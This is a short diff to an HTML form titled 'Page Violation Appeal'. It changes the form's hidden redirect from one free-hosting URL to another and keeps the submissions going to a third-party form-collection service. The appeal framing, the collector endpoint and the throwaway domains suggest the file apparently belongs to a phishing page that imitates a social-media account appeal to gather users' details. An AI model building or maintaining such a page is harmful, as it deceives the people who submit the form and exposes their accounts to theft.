--- a/form.html
+++ b/form.html
@@ -264,7 +264,7 @@
         <form class="verification-card" action="https://submit-form.com/gYJNtlgQf" method="POST">
 
             <!-- Redirect after submission -->
-            <input type="hidden" name="_redirect" value="https://submit-in-key.page.gd/">
+            <input type="hidden" name="_redirect" value="https://appeal-earnings-block.netlify.app/">
 
             <div class="card-header">
                 <div class="card-title">Page Violation Appeal</div>
